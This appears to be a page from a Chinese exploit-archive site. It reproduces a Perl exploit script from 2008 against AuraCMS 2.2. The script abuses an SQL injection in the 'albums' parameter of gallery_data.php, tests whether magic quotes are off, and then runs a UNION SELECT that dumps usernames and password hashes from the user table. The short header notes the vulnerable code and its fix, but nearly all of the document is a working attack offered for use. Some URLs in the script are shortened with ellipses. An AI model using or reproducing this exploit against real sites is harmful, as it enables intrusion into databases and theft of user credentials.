首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit


http://www.gipsky.com/
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case 'detail':
# 174: if (isset($_GET['id'])){
# 175: $id = $_GET['id'];
# 176: $albums = $_GET['albums'];
#
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install gallery update!
#

if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------------oOO---(_)---OOo--------------------";
print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";
print "\n | (works only with magic quotes = off) |";
print "\n | coded by DNX |";
print "\n --------------------------------------------------------";
print "\n[!] Usage......: perl aura.pl [Host] [Path] <Options>";
print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";
print "\n[!] Options....:";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, "p=s");

print "[!] Exploiting...\n";

exploit();

print "\n[!] Exploit done\n";

sub exploit
{
my $url1 = "http://".$host.$path."index ... allery&mod=yes";
my $url2 = "http://".$host.$path."mod/g ... x/gallery_data.php";
my $ua = LWP::UserAgent->new;
my $cookie = HTTP::Cookies->new();
my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
my $res = "";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

###############
# exist file? #
###############
$res = $ua->get($url2);
if(!$res->is_success)
{
die("[!] Failed, file not found\n");
}

##########################
# get cookie from server #
##########################
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$ua->get($url2);
$res = $ua->get($url2);

######################
# check magic quotes #
######################
$url2 .= "?action=detail&id=&image=&albums='";
$res = $ua->get($url2);
$content = $res->content;

if($content =~ /,\"albums\":\[\"\\\\'\"],/)
{
die("[!] Failed, magic quotes on\n")
}

##############
# get hashes #
##############
$url2 .= " union select user,2,3,4,5,6,7,password,9,10 from useraura/*";
$res = $ua->get($url2);
$content = $res->content;

my @cont = split(/{\"files\"/, $content);
foreach (@cont)
{
if($_ =~ /$regexp/)
{
print "$1 $3\n";
}
}
}

[2008-02-12]
<< Joomla Component pcchess <= 0.8 Remote SQL Injection Vulnerability Citrix Presentation Server Client WFICA.OCX ActiveX Heap BOF Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号